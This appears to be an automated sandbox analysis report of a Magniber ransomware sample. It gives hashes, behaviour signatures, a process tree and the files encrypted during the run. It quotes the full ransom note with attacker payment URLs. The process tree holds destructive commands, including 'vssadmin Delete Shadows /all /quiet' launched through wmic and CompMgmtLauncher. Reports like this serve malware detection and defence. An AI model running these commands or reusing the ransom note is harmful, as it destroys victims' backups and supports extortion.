Analysis

  • max time kernel
    99s
  • max time network
    160s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    22-06-2021 14:06

General

  • Target

    2.exe

  • Size

    21KB

  • MD5

    2953b6ec692537f8eace1077081f9e43

  • SHA1

    6db28862c0dbb589b918f812ff61cfdac0248eab

  • SHA256

    2cf60c433df3dcc84b80e18c93e578bf18b31c5c49777953702c53166275796b

  • SHA512

    11959d3841c3824e5d4c68771f67db6227423d99f5beb6559c165081b6300fb3553633ce871157bd972845730fcc9e1201c10507f114d7458b3940c8cdf0ca85

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!
====================================================================================================
Your files are NOT damaged! Your files are modified only. This modification is reversible.
The only 1 way to decrypt your files is to receive the private key and decryption program.
Any attempts to restore your files with the third party software will be fatal for your files!
====================================================================================================
To receive the private key and decryption program follow the instructions below:
1. Download "Tor Browser" from https://www.torproject.org/ and install it.
2. In the "Tor Browser" open your personal page here:
http://7478f2f8eed008e0ekmxfykjdz.5s4ixqul2enwxrqv.onion/kmxfykjdz
Note! This page is available via "Tor Browser" only.
====================================================================================================
Also you can use temporary addresses on your personal page without using "Tor Browser":
http://7478f2f8eed008e0ekmxfykjdz.bestep.cyou/kmxfykjdz
http://7478f2f8eed008e0ekmxfykjdz.plughas.casa/kmxfykjdz
http://7478f2f8eed008e0ekmxfykjdz.ownhits.space/kmxfykjdz
http://7478f2f8eed008e0ekmxfykjdz.dayhit.xyz/kmxfykjdz
Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://7478f2f8eed008e0ekmxfykjdz.5s4ixqul2enwxrqv.onion/kmxfykjdz

http://7478f2f8eed008e0ekmxfykjdz.bestep.cyou/kmxfykjdz

http://7478f2f8eed008e0ekmxfykjdz.plughas.casa/kmxfykjdz

http://7478f2f8eed008e0ekmxfykjdz.ownhits.space/kmxfykjdz

http://7478f2f8eed008e0ekmxfykjdz.dayhit.xyz/kmxfykjdz

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

  • Process spawned unexpected child process 10 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 5 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1208
    • C:\Users\Admin\AppData\Local\Temp\2.exe
      "C:\Users\Admin\AppData\Local\Temp\2.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:916
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2016
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
          PID:1388
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1288
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
          PID:472
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1968
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1728
  • C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1180
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:608
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1616
  • C:\Windows\system32\taskhost.exe
    "taskhost.exe"
    1⤵
    • Modifies extensions of user files
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1124
    • C:\Windows\system32\notepad.exe
      notepad.exe C:\Users\Public\readme.txt
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:2024
    • C:\Windows\system32\cmd.exe
      cmd /c "start http://7478f2f8eed008e0ekmxfykjdz.bestep.cyou/kmxfykjdz^&1^&47212692^&73^&325^&12"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:568
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" http://7478f2f8eed008e0ekmxfykjdz.bestep.cyou/kmxfykjdz&1&47212692&73&325&12
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1596
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1596 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1072
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1512
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1840
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:304
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2180
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:2388
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2056
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      PID:2252
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:2456
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2076
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2212
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:2436
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2068
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      PID:2280
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:2544
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:792
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      PID:2196
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:2484
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:2708
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:2700
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:2732
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:2772
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:2764
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    PID:2888

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\4KE4OZWV.txt
  • C:\Users\Admin\Desktop\ConvertToCompare.zip.kmxfykjdz
  • C:\Users\Admin\Desktop\DisableProtect.xls.kmxfykjdz
  • C:\Users\Admin\Desktop\ExportRedo.jpeg.kmxfykjdz
  • C:\Users\Admin\Desktop\FindReceive.pdf.kmxfykjdz
  • C:\Users\Admin\Desktop\HideDebug.potx.kmxfykjdz
  • C:\Users\Admin\Desktop\InvokeResize.bmp.kmxfykjdz
  • C:\Users\Admin\Desktop\LockProtect.iso.kmxfykjdz
  • C:\Users\Admin\Desktop\MergeMeasure.gif.kmxfykjdz
  • C:\Users\Admin\Desktop\NewStart.mov.kmxfykjdz
  • C:\Users\Admin\Desktop\PopExit.docx.kmxfykjdz
  • C:\Users\Admin\Desktop\SwitchRestore.mov.kmxfykjdz
  • C:\Users\Admin\Desktop\SwitchResume.vbs.kmxfykjdz
  • C:\Users\Admin\Desktop\readme.txt
  • C:\Users\Public\readme.txt